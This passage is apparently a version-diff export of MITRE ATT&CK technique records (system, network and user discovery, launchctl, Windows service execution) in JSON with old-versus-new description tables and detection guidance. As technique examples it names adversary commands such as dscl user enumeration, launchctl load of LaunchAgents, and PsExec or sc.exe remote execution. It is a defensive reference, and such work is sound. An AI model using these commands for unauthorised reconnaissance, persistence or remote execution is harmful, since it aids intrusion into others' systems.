macOS. As an example, adversaries with user-level access can execute the df -aH command to obtain currently mounted disks and associated freely available space. [System Information Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered from other forms of discovery and reconnaissance can drive payload development and concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\\n \\n Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access to instance and virtual machine information via APIs. Successful authenticated API calls can return data such as the operating system platform and status of a particular instance or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: Google Instances Resource)(Citation: Microsoft Virutal Machine API)\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"OSX.FairyTale\", \"old_value\": \"Amazon Describe Instance\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"Phile Stokes. (2018, September 20). On the Trail of OSX.FairyTale | Adware Playing at Malware. Retrieved August 24, 2021.\", \"old_value\": \"Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.\"}, \"root['external_references'][2]['url']\": {\"new_value\": \"https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/\", \"old_value\": \"https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"20 macOS Common Tools and Techniques\", \"old_value\": \"Google Instances Resource\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.\", \"old_value\": \"Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.\"}, \"root['external_references'][3]['url']\": {\"new_value\": \"https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\", \"old_value\": \"https://cloud.google.com/compute/docs/reference/rest/v1/instances\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"Amazon Describe Instance\", \"old_value\": \"Microsoft Virutal Machine API\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"Amazon. (n.d.). describe-instance-information. Retrieved March 3, 2020.\", \"old_value\": \"Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html\", \"old_value\": \"https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.3\", \"old_value\": \"2.2\"}}, \"iterable_item_added\": {\"root['external_references'][5]\": {\"source_name\": \"Google Instances Resource\", \"description\": \"Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.\", \"url\": \"https://cloud.google.com/compute/docs/reference/rest/v1/instances\"}, \"root['external_references'][6]\": {\"source_name\": \"Microsoft Virutal Machine API\", \"description\": \"Microsoft. (2019, March 1). Virtual Machines - Get. Retrieved October 8, 2019.\", \"url\": \"https://docs.microsoft.com/en-us/rest/api/compute/virtualmachines/get\"}, \"root['x_mitre_contributors'][0]\": \"Maril Vernon @shewhohacks\"}}",
"previous_version": "2.2",
"version_change": "2.2 \u2192 2.3",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | An adversary may attempt to get detailed information about t | t | 1 | An adversary may attempt to get detailed information about t |
| > | he operating system and hardware, including version, patches | > | he operating system and hardware, including version, patches | ||
| > | , hotfixes, service packs, and architecture. Adversaries may | > | , hotfixes, service packs, and architecture. Adversaries may | ||
| > | use the information from [System Information Discovery](htt | > | use the information from [System Information Discovery](htt | ||
| > | ps://attack.mitre.org/techniques/T1082) during automated dis | > | ps://attack.mitre.org/techniques/T1082) during automated dis | ||
| > | covery to shape follow-on behaviors, including whether or no | > | covery to shape follow-on behaviors, including whether or no | ||
| > | t the adversary fully infects the target and/or attempts spe | > | t the adversary fully infects the target and/or attempts spe | ||
| > | cific actions. Tools such as [Systeminfo](https://attack.mi | > | cific actions. Tools such as [Systeminfo](https://attack.mi | ||
| > | tre.org/software/S0096) can be used to gather detailed syste | > | tre.org/software/S0096) can be used to gather detailed syste | ||
| > | m information. A breakdown of system data can also be gather | > | m information. If running with privileged access, a breakdow | ||
| > | ed through the macOS <code>systemsetup</code> command, but i | > | n of system data can be gathered through the <code>systemset | ||
| > | t requires administrative privileges. Infrastructure as a S | > | up</code> configuration tool on macOS. As an example, advers | ||
| > | ervice (IaaS) cloud providers such as AWS, GCP, and Azure al | > | aries with user-level access can execute the <code>df -aH</c | ||
| > | low access to instance and virtual machine information via A | > | ode> command to obtain currently mounted disks and associate | ||
| > | PIs. Successful authenticated API calls can return data such | > | d freely available space. [System Information Discovery](htt | ||
| > | as the operating system platform and status of a particular | > | ps://attack.mitre.org/techniques/T1082) combined with inform | ||
| > | instance or the model view of a virtual machine.(Citation: | > | ation gathered from other forms of discovery and reconnaissa | ||
| > | Amazon Describe Instance)(Citation: Google Instances Resourc | > | nce can drive payload development and concealment.(Citation: | ||
| > | e)(Citation: Microsoft Virutal Machine API) | > | OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniqu | ||
| > | es) Infrastructure as a Service (IaaS) cloud providers such | ||||
| > | as AWS, GCP, and Azure allow access to instance and virtual | ||||
| > | machine information via APIs. Successful authenticated API | ||||
| > | calls can return data such as the operating system platform | ||||
| > | and status of a particular instance or the model view of a v | ||||
| > | irtual machine.(Citation: Amazon Describe Instance)(Citation | ||||
| > | : Google Instances Resource)(Citation: Microsoft Virutal Mac | ||||
| > | hine API) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may look for details about the network configura | t | 1 | Adversaries may look for details about the network configura |
| > | tion and settings of systems they access or through informat | > | tion and settings, such as IP and/or MAC addresses, of syste | ||
| > | ion discovery of remote systems. Several operating system ad | > | ms they access or through information discovery of remote sy | ||
| > | ministration utilities exist that can be used to gather this | > | stems. Several operating system administration utilities exi | ||
| > | information. Examples include [Arp](https://attack.mitre.or | > | st that can be used to gather this information. Examples inc | ||
| > | g/software/S0099), [ipconfig](https://attack.mitre.org/softw | > | lude [Arp](https://attack.mitre.org/software/S0099), [ipconf | ||
| > | are/S0100)/[ifconfig](https://attack.mitre.org/software/S010 | > | ig](https://attack.mitre.org/software/S0100)/[ifconfig](http | ||
| > | 1), [nbtstat](https://attack.mitre.org/software/S0102), and | > | s://attack.mitre.org/software/S0101), [nbtstat](https://atta | ||
| > | [route](https://attack.mitre.org/software/S0103). Adversari | > | ck.mitre.org/software/S0102), and [route](https://attack.mit | ||
| > | es may use the information from [System Network Configuratio | > | re.org/software/S0103). Adversaries may use the information | ||
| > | n Discovery](https://attack.mitre.org/techniques/T1016) duri | > | from [System Network Configuration Discovery](https://attac | ||
| > | ng automated discovery to shape follow-on behaviors, includi | > | k.mitre.org/techniques/T1016) during automated discovery to | ||
| > | ng whether or not the adversary fully infects the target and | > | shape follow-on behaviors, including determining certain acc | ||
| > | /or attempts specific actions. | > | ess within the target network and what actions to do next. |
whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "discovery"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1033",
"external_id": "T1033"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/577.html",
"external_id": "CAPEC-577"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Process: Process Creation",
"Command: Command Execution"
],
"x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator"
],
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.3",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-12 13:34:34.153000+00:00\", \"old_value\": \"2020-03-15 01:03:47.866000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\\n\\nVarious utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.\", \"old_value\": \"Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\\n\\nUtilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.\", \"diff\": \"--- \\n+++ \\n@@ -1,3 +1,3 @@\\n Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\\n \\n-Utilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.\\n+Various utilities and commands may acquire this information, including whoami. In macOS and Linux, the currently logged in user can be identified with w and who. On macOS the dscl . list /Users | grep -v '_' command can also be used to enumerate user accounts. Environment variables, such as %USERNAME% and $USER, may also be used to access this information.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.3\", \"old_value\": \"1.2\"}}}",
"previous_version": "1.2",
"version_change": "1.2 \u2192 1.3",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may attempt to identify the primary user, curren | t | 1 | Adversaries may attempt to identify the primary user, curren |
| > | tly logged in user, set of users that commonly uses a system | > | tly logged in user, set of users that commonly uses a system | ||
| > | , or whether a user is actively using the system. They may d | > | , or whether a user is actively using the system. They may d | ||
| > | o this, for example, by retrieving account usernames or by u | > | o this, for example, by retrieving account usernames or by u | ||
| > | sing [OS Credential Dumping](https://attack.mitre.org/techni | > | sing [OS Credential Dumping](https://attack.mitre.org/techni | ||
| > | ques/T1003). The information may be collected in a number of | > | ques/T1003). The information may be collected in a number of | ||
| > | different ways using other Discovery techniques, because us | > | different ways using other Discovery techniques, because us | ||
| > | er and username details are prevalent throughout a system an | > | er and username details are prevalent throughout a system an | ||
| > | d include running process ownership, file/directory ownershi | > | d include running process ownership, file/directory ownershi | ||
| > | p, session information, and system logs. Adversaries may use | > | p, session information, and system logs. Adversaries may use | ||
| > | the information from [System Owner/User Discovery](https:// | > | the information from [System Owner/User Discovery](https:// | ||
| > | attack.mitre.org/techniques/T1033) during automated discover | > | attack.mitre.org/techniques/T1033) during automated discover | ||
| > | y to shape follow-on behaviors, including whether or not the | > | y to shape follow-on behaviors, including whether or not the | ||
| > | adversary fully infects the target and/or attempts specific | > | adversary fully infects the target and/or attempts specific | ||
| > | actions. Utilities and commands that acquire this informat | > | actions. Various utilities and commands may acquire this i | ||
| > | ion include <code>whoami</code>. In Mac and Linux, the curre | > | nformation, including <code>whoami</code>. In macOS and Linu | ||
| > | ntly logged in user can be identified with <code>w</code> an | > | x, the currently logged in user can be identified with <code | ||
| > | d <code>who</code>. | > | >w</code> and <code>who</code>. On macOS the <code>dscl . li | ||
| > | st /Users | grep -v '_'</code> command can also be used to e | ||||
| > | numerate user accounts. Environment variables, such as <code | ||||
| > | >%USERNAME%</code> and <code>$USER</code>, may also be used | ||||
| > | to access this information. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse system services or daemons to execute | t | 1 | Adversaries may abuse system services or daemons to execute |
| > | commands or programs. Adversaries can execute malicious cont | > | commands or programs. Adversaries can execute malicious cont | ||
| > | ent by interacting with or creating services. Many services | > | ent by interacting with or creating services either locally | ||
| > | are set to run at boot, which can aid in achieving persisten | > | or remotely. Many services are set to run at boot, which can | ||
| > | ce ([Create or Modify System Process](https://attack.mitre.o | > | aid in achieving persistence ([Create or Modify System Proc | ||
| > | rg/techniques/T1543)), but adversaries can also abuse servic | > | ess](https://attack.mitre.org/techniques/T1543)), but advers | ||
| > | es for one-time or temporary execution. | > | aries can also abuse services for one-time or temporary exec | ||
| > | ution. |
launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \"%s/Library/LaunchAgents/%s\" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)\n",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1569/001",
"external_id": "T1569.001"
},
{
"source_name": "Launchctl Man",
"description": "SS64. (n.d.). launchctl. Retrieved March 28, 2020.",
"url": "https://ss64.com/osx/launchctl.html"
},
{
"source_name": "Sofacy Komplex Trojan",
"description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/"
},
{
"source_name": "20 macOS Common Tools and Techniques",
"description": "Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.",
"url": "https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Process: Process Creation",
"Service: Service Creation",
"File: File Modification"
],
"x_mitre_detection": "Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \n\nMonitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"root"
],
"x_mitre_platforms": [
"macOS"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 18:40:23.141000+00:00\", \"old_value\": \"2020-06-08 23:28:29.079000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\\n\\nAdversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \\\"%s/Library/LaunchAgents/%s\\\" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)\\n\", \"old_value\": \"Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\\n\\nBy loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)\\n\\nRunning a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute \\\"arg\\\" \\\"arg\\\" \\\"arg\\\" . Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,3 @@\\n-Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\\n+Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)\\n \\n-By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)\\n-\\n-Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute \\\"arg\\\" \\\"arg\\\" \\\"arg\\\" . Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.\\n+Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manually run the commands launchctl load -w \\\"%s/Library/LaunchAgents/%s\\\" or /bin/launchctl load to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \\n\\nMonitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \\n\\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.\", \"old_value\": \"KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,5 @@\\n-KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.\\n+Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line launchctl command. Plist files are located in the root, system, and users /Library/LaunchAgents or /Library/LaunchDaemons folders. \\n+\\n+Monitor command-line execution of the launchctl command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to /tmp and /Shared folders locations are potentially suspicious. \\n+\\n+When removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][3]\": {\"source_name\": \"20 macOS Common Tools and Techniques\", \"description\": \"Phil Stokes. (2021, February 16). 20 Common Tools & Techniques Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.\", \"url\": \"https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse launchctl to execute commands or progr | t | 1 | Adversaries may abuse launchctl to execute commands or progr |
| > | ams. Launchctl controls the macOS launchd process, which han | > | ams. Launchctl interfaces with launchd, the service manageme | ||
| > | dles things like [Launch Agent](https://attack.mitre.org/tec | > | nt framework for macOS. Launchctl supports taking subcommand | ||
| > | hniques/T1543/001)s and [Launch Daemon](https://attack.mitre | > | s on the command-line, interactively, or even redirected fro | ||
| > | .org/techniques/T1543/004)s, but can execute other commands | > | m standard input.(Citation: Launchctl Man) Adversaries use | ||
| > | or programs itself. Launchctl supports taking subcommands on | > | launchctl to execute commands and programs as [Launch Agent] | ||
| > | the command-line, interactively, or even redirected from st | > | (https://attack.mitre.org/techniques/T1543/001)s or [Launch | ||
| > | andard input.(Citation: Launchctl Man) By loading or reload | > | Daemon](https://attack.mitre.org/techniques/T1543/004)s. Com | ||
| > | ing [Launch Agent](https://attack.mitre.org/techniques/T1543 | > | mon subcommands include: <code>launchctl load</code>,<code>l | ||
| > | /001)s or [Launch Daemon](https://attack.mitre.org/technique | > | aunchctl unload</code>, and <code>launchctl start</code>. Ad | ||
| > | s/T1543/004)s, adversaries can install persistence or execut | > | versaries can use scripts or manually run the commands <code | ||
| > | e changes they made.(Citation: Sofacy Komplex Trojan) Runni | > | >launchctl load -w \"%s/Library/LaunchAgents/%s\"</code> or <c | ||
| > | ng a command from launchctl is as simple as <code>launchctl | > | ode>/bin/launchctl load</code> to execute [Launch Agent](htt | ||
| > | submit -l <labelName> -- /Path/to/thing/to/execute \"arg\" \"ar | > | ps://attack.mitre.org/techniques/T1543/001)s or [Launch Daem | ||
| > | g\" \"arg\"</code>. Adversaries can abuse this functionality to | > | on](https://attack.mitre.org/techniques/T1543/004)s.(Citatio | ||
| > | execute code or even bypass application control if launchct | > | n: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools an | ||
| > | l is an allowed process. | > | d Techniques) |
services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "execution"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1569/002",
"external_id": "T1569.002"
},
{
"source_name": "Microsoft Service Control Manager",
"description": "Microsoft. (2018, May 31). Service Control Manager. Retrieved March 28, 2020.",
"url": "https://docs.microsoft.com/windows/win32/services/service-control-manager"
},
{
"source_name": "Russinovich Sysinternals",
"description": "Russinovich, M. (2014, May 2). Windows Sysinternals PsExec v2.11. Retrieved May 13, 2015.",
"url": "https://technet.microsoft.com/en-us/sysinternals/bb897553.aspx"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Command: Command Execution",
"Process: Process Creation",
"Service: Service Creation",
"Windows Registry: Windows Registry Key Modification"
],
"x_mitre_detection": "Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).",
"x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"Administrator",
"SYSTEM"
],
"x_mitre_platforms": [
"Windows"
],
"x_mitre_remote_support": true,
"x_mitre_version": "1.1",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-08-30 17:42:40.945000+00:00\", \"old_value\": \"2020-03-28 18:52:02.384000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\\n\\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\\n\\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.\", \"old_value\": \"Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\\n\\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)\\n\\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.\", \"diff\": \"--- \\n+++ \\n@@ -1,5 +1,5 @@\\n Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\\n \\n-[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals)\\n+[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\\n \\n Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may abuse the Windows service control manager to | t | 1 | Adversaries may abuse the Windows service control manager to |
| > | execute malicious commands or payloads. The Windows service | > | execute malicious commands or payloads. The Windows service | ||
| > | control manager (<code>services.exe</code>) is an interface | > | control manager (<code>services.exe</code>) is an interface | ||
| > | to manage and manipulate services.(Citation: Microsoft Serv | > | to manage and manipulate services.(Citation: Microsoft Serv | ||
| > | ice Control Manager) The service control manager is accessib | > | ice Control Manager) The service control manager is accessib | ||
| > | le to users via GUI components as well as system utilities s | > | le to users via GUI components as well as system utilities s | ||
| > | uch as <code>sc.exe</code> and [Net](https://attack.mitre.or | > | uch as <code>sc.exe</code> and [Net](https://attack.mitre.or | ||
| > | g/software/S0039). [PsExec](https://attack.mitre.org/softwa | > | g/software/S0039). [PsExec](https://attack.mitre.org/softwa | ||
| > | re/S0029) can also be used to execute commands or payloads v | > | re/S0029) can also be used to execute commands or payloads v | ||
| > | ia a temporary Windows service created through the service c | > | ia a temporary Windows service created through the service c | ||
| > | ontrol manager API.(Citation: Russinovich Sysinternals) Adv | > | ontrol manager API.(Citation: Russinovich Sysinternals) Tool | ||
| > | ersaries may leverage these mechanisms to execute malicious | > | s such as [PsExec](https://attack.mitre.org/software/S0029) | ||
